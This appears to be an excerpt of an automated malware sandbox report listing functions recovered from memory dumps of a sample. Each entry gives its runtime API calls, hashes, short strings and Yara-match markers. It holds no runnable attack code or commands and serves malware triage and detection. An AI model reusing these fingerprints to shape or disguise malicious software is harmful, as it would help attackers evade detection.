Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: a1bc0c45bb5db4fd8c0ed40d5718f994464989143a5eec134607d76a8a6341a5
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: D3412432904304AFDB00EFA5ED80B9E3BEAEF48714F11842FE91996290DB75D645DF21

Uniqueness

Uniqueness Score: -1.00%

Function 024184AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 024184B1
_free.LIBCMT ref: 024184E2
_free.LIBCMT ref: 024184F5
_free.LIBCMT ref: 02418513
_free.LIBCMT ref: 02418525
_free.LIBCMT ref: 02418536
_free.LIBCMT ref: 02418541
_free.LIBCMT ref: 02418565
_free.LIBCMT ref: 02418581
_free.LIBCMT ref: 02418597
_free.LIBCMT ref: 024185BF

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: d82aba09831792769da8da0cbc89aed4f9c3d798c214d40575c93ee1bab71769
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 4A319331901250DFEB21AF56FC8484E77A6FB143247148A2FEA0D573B0CBB469C9AF94

Uniqueness

Uniqueness Score: -1.00%

Function 0243FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0243FC1F

Part of subcall function 0242169C: std::exception::_Copy_str.LIBCMT ref: 024216B5

__CxxThrowException@8.LIBCMT ref: 0243FC34
std::exception::exception.LIBCMT ref: 0243FC4D
__CxxThrowException@8.LIBCMT ref: 0243FC62
std::regex_error::regex_error.LIBCPMT ref: 0243FC74

Part of subcall function 0243F914: std::exception::exception.LIBCMT ref: 0243F92E

__CxxThrowException@8.LIBCMT ref: 0243FC82
std::exception::exception.LIBCMT ref: 0243FC9B
__CxxThrowException@8.LIBCMT ref: 0243FCB0

Strings

leM, xrefs: 0243FCA8

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: cf3453e79aec649f9123a508ae2ee4333e5ce51b0c25107fccc502aaa51d4003
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 7D11BC79C0020DBBCF00FFA6D495CDDBB7DAA04744B808967AD1897641EB74A34C8F94

Uniqueness

Uniqueness Score: -1.00%

Function 023FF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 023FF01F

Part of subcall function 02411602: __FF_MSGBANNER.LIBCMT ref: 02411619
Part of subcall function 02411602: __NMSG_WRITE.LIBCMT ref: 02411620

_malloc.LIBCMT ref: 023FF02B
_wprintf.LIBCMT ref: 023FF03E
_free.LIBCMT ref: 023FF044
_free.LIBCMT ref: 023FF065
_malloc.LIBCMT ref: 023FF06D
_sprintf.LIBCMT ref: 023FF0C0
_wprintf.LIBCMT ref: 023FF0D2
_wprintf.LIBCMT ref: 023FF0DC
_free.LIBCMT ref: 023FF0E5

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 104b1f19b2f117ed9db6941a62103005eb705e0433b3227bc6ee4cc666b528f2
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 351103B29406647AC361A7B65C11FFF7BED9F46702F0801AEFF8CD1180EA595A049BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02401960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 024019C6
__CxxThrowException@8.LIBCMT ref: 024019F1
__CxxThrowException@8.LIBCMT ref: 02401A1A
__CxxThrowException@8.LIBCMT ref: 02401A4B
_memset.LIBCMT ref: 02401A6A
__CxxThrowException@8.LIBCMT ref: 02401A90
_malloc.LIBCMT ref: 02401AA0
_memset.LIBCMT ref: 02401AAB
_sprintf.LIBCMT ref: 02401ACE

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 1aaf5659f2066700f657db3044c4f40eb1bef2c124ad0bad1a202a015d91de60
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 4C513C71D40219ABDB11DBA6DC86FEFBBB9FB04744F10002AF909F6280E7745A458FA5

Uniqueness

Uniqueness Score: -1.00%

Function 004054E6 Relevance: 12.1, APIs: 8, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 004054F5

Part of subcall function 00408952: TlsGetValue.KERNEL32(00000000,?,004089ED,?,?,00408BA6,?,00405C19,?,?,004061D0,?,00402392), ref: 00408964
Part of subcall function 00408952: TlsGetValue.KERNEL32(00000004,?,004089ED,?,?,00408BA6,?,00405C19,?,?,004061D0,?,00402392), ref: 0040897B

__decode_pointer.LIBCMT ref: 00405505

Part of subcall function 00408952: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004089ED,?,?,00408BA6,?,00405C19,?,?,004061D0,?,00402392), ref: 00408991
Part of subcall function 00408952: __crt_waiting_on_module_handle.LIBCMT ref: 0040899C
Part of subcall function 00408952: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 004089AC

__msize.LIBCMT ref: 00405523
__realloc_crt.LIBCMT ref: 00405547
__realloc_crt.LIBCMT ref: 0040555D
__encode_pointer.LIBCMT ref: 0040556F
__encode_pointer.LIBCMT ref: 0040557D
__encode_pointer.LIBCMT ref: 00405588

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __encode_pointer$Value__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
String ID:
API String ID: 2836500094-0
Opcode ID: 306c9e6be83aeb9639f75da8659460647e50f2ea36e76d93a5b79e4f81dd418e
Instruction ID: 5aaf25b28b930d396692d7e5ff28467f3ef6f90411816e538a773a4a8e1c44d3
Opcode Fuzzy Hash: 306c9e6be83aeb9639f75da8659460647e50f2ea36e76d93a5b79e4f81dd418e
Instruction Fuzzy Hash: C311AF72504601BADB01AB69ED828AA3BA7DB85364325843FF444FA191EF39DD418A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00404B3B Relevance: 12.1, APIs: 8, Instructions: 60fileCOMMON

Download Yara Rule

APIs

PeekConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00404B76
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404B91
GlobalFree.KERNEL32(00000000), ref: 00404B98
ReleaseActCtx.KERNEL32(?), ref: 00404BA2
SetComputerNameA.KERNEL32(00000000), ref: 00404BA9
SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 00404BB1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00404BB8
FindNextFileA.KERNEL32(00000000,?), ref: 00404BC6

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: ConsoleFree$BoostCharacterComputerEnvironmentFileFillFindGlobalInputNameNextOutputPeekPriorityProcessReleaseStrings
String ID:
API String ID: 1313739779-0
Opcode ID: abb8631fac93c6cb2309624922b222abda0fac8d100c67c2b691836eebb8ea34
Instruction ID: f74aadf0f070808a9b34f4db44a9fabf019c36944a0f3fe93d5325e19b98b120
Opcode Fuzzy Hash: abb8631fac93c6cb2309624922b222abda0fac8d100c67c2b691836eebb8ea34
Instruction Fuzzy Hash: DD114F76901118BFD711ABE0EE48CEF7B7CEF49341B004062F645E2120D7389A458BB9

Uniqueness

Uniqueness Score: -1.00%

Function 023FF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 023FF284
__CxxThrowException@8.LIBCMT ref: 023FF2AF
__CxxThrowException@8.LIBCMT ref: 023FF2DE
__CxxThrowException@8.LIBCMT ref: 023FF30F
_memset.LIBCMT ref: 023FF32E
__CxxThrowException@8.LIBCMT ref: 023FF354
_sprintf.LIBCMT ref: 023FF373

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 0a6bcbec128cb0ce1575dc349bff4ec18c5f2af07001ef8b72264b79a6b6ef31
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 05515171D40249AADF51DFA2DC86FEEBB79EB04704F10002AFA05B61C0D775AA458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 023FF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 023FF4B7
__CxxThrowException@8.LIBCMT ref: 023FF4E2
__CxxThrowException@8.LIBCMT ref: 023FF504
__CxxThrowException@8.LIBCMT ref: 023FF535
_memset.LIBCMT ref: 023FF554
__CxxThrowException@8.LIBCMT ref: 023FF57A
_sprintf.LIBCMT ref: 023FF594

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: f8c2311ad0366daaf341980ccad4309f4727a5703dcb364479ac3abd3a4677fb
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 82513171D40249AADF21DFA6DD85FEEBBB9EB04704F10012AFA09B61C0D774A9058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B555 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040B561

Part of subcall function 00408B9E: __getptd_noexit.LIBCMT ref: 00408BA1
Part of subcall function 00408B9E: __amsg_exit.LIBCMT ref: 00408BAE

__amsg_exit.LIBCMT ref: 0040B581
__lock.LIBCMT ref: 0040B591
InterlockedDecrement.KERNEL32(?), ref: 0040B5AE
InterlockedIncrement.KERNEL32(023E1670), ref: 0040B5D9

Strings

gJ, xrefs: 0040B5B8

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: gJ
API String ID: 4271482742-1485095282
Opcode ID: 6fe938256e307b45212e0bc211643723d6357f4284ab999f88a57e693d857a27
Instruction ID: 4494d421b78f6897492384da27cc19693bf82d3cc8682612e09ab2adfaedcc10
Opcode Fuzzy Hash: 6fe938256e307b45212e0bc211643723d6357f4284ab999f88a57e693d857a27
Instruction Fuzzy Hash: C401A531901611ABDB21AF25980575E7760EF08728F06017BE880B76D0CB3C6D41CBCD

Uniqueness

Uniqueness Score: -1.00%

Function 0243208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 024320C6
__invoke_watson.LIBCMT ref: 02432120
_strlen.LIBCMT ref: 024320D4

Part of subcall function 02415BA8: __getptd_noexit.LIBCMT ref: 02415BA8

_strnlen.LIBCMT ref: 0243215F
__lock.LIBCMT ref: 02432170
__getenv_helper_nolock.LIBCMT ref: 0243217B

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 2216b738f765664cacc8ad0e5baf307752699160ee657ee24cc292e37485791a
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 8531E5729006256BDB23EB65DC00BAF37A69F49B64F11401BEE14EB384DBB48D45CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 024B66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 024B66DD

Part of subcall function 024159BF: __calloc_crt.LIBCMT ref: 024159E2
Part of subcall function 024159BF: __initptd.LIBCMT ref: 02415A04

__calloc_crt.LIBCMT ref: 024B6700
__get_sys_err_msg.LIBCMT ref: 024B671E
__invoke_watson.LIBCMT ref: 024B673B
__get_sys_err_msg.LIBCMT ref: 024B676D
__invoke_watson.LIBCMT ref: 024B678B

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: d5bcfeda8df410bb1b9ce9f6b0e19c3b2e8dc1c6bf89e7d1c2b08330118870af
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: B711C431600A146BEB236E66DC41BEB738EDF00BA0F02046BFD0896740E731DD114AF5

Uniqueness

Uniqueness Score: -1.00%

Function 00406591 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004065B3
__calloc_crt.LIBCMT ref: 004065CC

Strings

hdJ, xrefs: 004065F8
XbJ, xrefs: 00406635
aJ, xrefs: 004065E3

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __calloc_crt
String ID: XbJ$hdJ$aJ
API String ID: 3494438863-3982869451
Opcode ID: a4c390a323f9f90c83ff34df4e63916b3681dd4dc3570566b78cad69634d66bf
Instruction ID: 034e06a1f0c6b9d44f983cd085d7d7dbabdd60fde9c860d53af919a366a32c94
Opcode Fuzzy Hash: a4c390a323f9f90c83ff34df4e63916b3681dd4dc3570566b78cad69634d66bf
Instruction Fuzzy Hash: AC119C313855113BEB288E1EBC516A72792A784338B1E513FE202E63D5FB3CC841414C

Uniqueness

Uniqueness Score: -1.00%

Function 004061A8 Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004061CB
_memset.LIBCMT ref: 004061F5

Part of subcall function 00405E27: __getptd_noexit.LIBCMT ref: 00405E27

Part of subcall function 00405DBF: __decode_pointer.LIBCMT ref: 00405DCA

WideCharToMultiByte.KERNEL32(?,?,?,00000001,?,?,?,?,?,00402392), ref: 0040628C
GetLastError.KERNEL32(?,?,00000001,?,?,?,?,?,00402392), ref: 004062AA
_memset.LIBCMT ref: 004062CC

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide__decode_pointer__getptd_noexit
String ID:
API String ID: 1064751000-0
Opcode ID: 5e383a6ac68ce4b46427bad05b47e6c3c2817dfce2b38dbe1d597ff98bf70ff1
Instruction ID: 8df0c06f17189da7409cd0cc9a3cec2afcef77544f14b6469c8b45ba004bd6fc
Opcode Fuzzy Hash: 5e383a6ac68ce4b46427bad05b47e6c3c2817dfce2b38dbe1d597ff98bf70ff1
Instruction Fuzzy Hash: 1B31AF71900146AFCB21BF64D8819AF3B60EB01314F0241BFF4527F2D2D7398DA59BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405F6B Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00405F89

Part of subcall function 004075E6: __mtinitlocknum.LIBCMT ref: 004075FC
Part of subcall function 004075E6: __amsg_exit.LIBCMT ref: 00407608
Part of subcall function 004075E6: EnterCriticalSection.KERNEL32(?,?,?,004073CD,00000004,004A4EE8,0000000C,00408ECF,?,?,00000000,00000000,00000000,?,00408B50,00000001), ref: 00407610

___sbh_find_block.LIBCMT ref: 00405F94
___sbh_free_block.LIBCMT ref: 00405FA3
HeapFree.KERNEL32(00000000,?,004A4E88,0000000C,004075C7,00000000,004A4F08,0000000C,00407601,?,?,?,004073CD,00000004,004A4EE8,0000000C), ref: 00405FD3
GetLastError.KERNEL32(?,004073CD,00000004,004A4EE8,0000000C,00408ECF,?,?,00000000,00000000,00000000,?,00408B50,00000001,00000214), ref: 00405FE4

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 43a786ec1801ca4899049075f04ddc19da742497bc061c25d69e8a887bf72264
Instruction ID: c9d630fe59bae0a3f10aaa5846cabf6faea0d0010a4cdcb4687ade1129b73ffe
Opcode Fuzzy Hash: 43a786ec1801ca4899049075f04ddc19da742497bc061c25d69e8a887bf72264
Instruction Fuzzy Hash: CE01A231848B07AADB206BB2AD0AB9F3A64EF10368F11443FF401B65D1CB3C9940CE9D

Uniqueness

Uniqueness Score: -1.00%

Function 02402670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 024026DB
_memset.LIBCMT ref: 02402A30
_memset.LIBCMT ref: 02402AC0

Strings

D, xrefs: 02402AC8

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 8513788833639890bcdabec43c7caa3e0103511dc5d3f5dd7163aedb31e38abb
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 40E13C71D40219AADF24DFA0DD89FEEB7B8BF04304F14417AE909A61D0EB74AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 023FD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 023FD8EA

Strings

$, xrefs: 023FDAE2
, xrefs: 023FDADB
(, xrefs: 023FDAE9

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: a50d00559a312bc41e6d29ca9a84d359557e7c1109b38dd130bd7a564f42a188
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 4691BF71D0021C9AEF21CFA0DC49BEEBBB5AF05308F1441A9D505B72C1DBB65A88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00402F76 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__set_statfp.LIBCMT ref: 00406F4B
__set_statfp.LIBCMT ref: 00406F66

Strings

f7O>, xrefs: 00402FEB
, xrefs: 00406F5E

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: __set_statfp
String ID: $f7O>
API String ID: 441778723-197540090
Opcode ID: d36ee20be69e24c723b383d926ebe454cf5faea3921979e9be3e5757cac83e9a
Instruction ID: acfe13decc694b8b0bf0e01ebba99c203ba7f98b304173061b2e93114dc9d0e4
Opcode Fuzzy Hash: d36ee20be69e24c723b383d926ebe454cf5faea3921979e9be3e5757cac83e9a
Instruction Fuzzy Hash: AB51691294E7D64FC7138BB458656997F709E13224B1A01DBC8C1EF1E3C66C8E1AC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 02415CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 02415CF4

Strings

U, xrefs: 02415CFD

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction ID: ec1fc33b9dd2a86c11c6f8cecb3a7b71c19268ac2fcb6e2206dc24c188b6b03a
Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction Fuzzy Hash: 3A21EB32604208AEEB009BA5DC45FFF73ADDB85750FD0416BF909C6290FB71E9458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00407338), ref: 0040CF19
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040CF29

Strings

KERNEL32, xrefs: 0040CF14
IsProcessorFeaturePresent, xrefs: 0040CF23

Memory Dump Source

Source File: 00000007.00000002.2557803430.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2557780836.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557861498.00000000004A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2557920791.000000000061D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_958B.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 4a0025941ae9ac294a4ddcb7b8edcb6c0f08a7d15cf90a61b1eb0f8165816ce2
Instruction ID: b57d27325a795bdd6eb17dd939704b4f8624e9cac594d97c34ba8d3e1fb6ad44
Opcode Fuzzy Hash: 4a0025941ae9ac294a4ddcb7b8edcb6c0f08a7d15cf90a61b1eb0f8165816ce2
Instruction Fuzzy Hash: 75F03630A40609E3DF001BA1AD4A26F7A79BF80782F9105A1E5D1B00E4DF749075824A

Uniqueness

Uniqueness Score: -1.00%

Function 0240A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0240A858
_memset.LIBCMT ref: 0240A869
_memset.LIBCMT ref: 0240A87A

Strings

p2Q, xrefs: 0240A882

Memory Dump Source

Source File: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23f0000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 8bfe1592fc3941887e3c58e2f177cdae85a2c631dc7c4443b03ae2058b1988b7
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: 31F0ED78698750A5F7227751BC26B857E91BB36B08F10408DE1182E2E1D3FD238CA79A

Uniqueness

Uniqueness Score: -1.00%

Function 0243FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

